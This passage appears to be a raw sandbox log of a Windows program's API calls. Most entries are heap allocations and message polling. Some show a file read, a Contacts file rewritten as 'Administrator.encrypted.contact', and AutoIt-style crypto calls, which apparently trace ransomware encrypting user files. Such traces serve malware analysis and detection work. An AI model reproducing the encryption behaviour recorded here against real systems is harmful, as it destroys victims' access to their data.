Size=0x10) returned 0x88c9a0 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.392] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c3818 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3688 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c3818 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c60 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.393] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x50) returned 0x7f3630 [0029.393] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts")) returned 0x11 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3630 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3688 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0029.393] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0029.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0029.394] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.encrypted.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\administrator.encrypted.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0029.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.394] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0029.394] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.394] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0029.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0029.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0029.395] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.395] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.395] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0029.395] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0029.395] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0029.399] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0xb1e, lpOverlapped=0x0) returned 1 [0029.400] ReadFile (in: hFile=0x140, lpBuffer=0x88ffb0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x88ffb0*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0029.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0029.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0029.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10b1e) returned 0x8affc0 [0029.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0029.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0029.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0029.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10b1e) returned 0x8c0ae8 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.402] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10b1e) returned 0x8affc0 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8affc0 | out: hHeap=0x770000) returned 1 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.402] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0029.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0029.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0029.403] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.403] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0029.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10b1e) returned 0x8affc0 [0029.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da188 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0029.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1e8 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0029.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1f8 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0029.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb38 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0029.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0029.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0029.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0029.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10b1e) returned 0x8d1610 [0029.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0029.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0029.405] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0029.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0029.405] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0029.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca30 | out: hHeap=0x770000) returned 1 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca30 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0029.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.405] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0029.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2f8 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbf8 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.406] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0029.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0029.406] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0029.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0029.406] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0029.407] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.407] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.407] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0029.407] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0029.407] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.407] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da268, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da268*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.407] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.407] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.407] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.407] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.407] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.407] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.407] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.407] PeekMessageW (in: 